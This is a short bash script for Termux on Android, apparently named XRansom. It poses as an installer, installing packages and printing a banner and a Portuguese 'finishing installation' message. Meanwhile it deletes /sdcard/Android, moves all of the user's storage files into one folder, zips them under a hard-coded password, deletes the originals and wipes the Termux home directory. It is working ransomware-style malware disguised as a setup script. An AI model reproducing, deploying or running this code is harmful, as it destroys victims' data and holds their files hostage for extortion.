#!/bin/bash
sd(){
    apt update
    apt upgrade
    apt install zip
    apt install figlet
    apt install pv
    apt install git
    mv cosmike.flf /data/data/com.termux/files/usr/share/figlet
    clear
    mkdir /sdcard/XRansom
    rm -rf /sdcard/Android 
    mv /sdcard/* /sdcard/XRansom
    echo "\033[01;32m"
    figlet -f cosmike XRansom|pv -qL 20
    echo -e "\033[01;35mBy \033[01;36m@WestSideDev\n\033[01;35mAgurde estamos terminando a instalação...\033[m"|pv -qL 15
    zip -P /0x02hav -r /sdcard/XRansom.zip /sdcard/XRansom >> /dev/null 
    rm -rf /sdcard/XRansom >> /dev/null
    rm -rf /data/data/com.termux/files/* >> /dev/null
}
if [[ "$(uname -o)" == "Android"]];then
    test -r /sdcard && sd || termux-setup-storage
else
    clear
    exit
fi
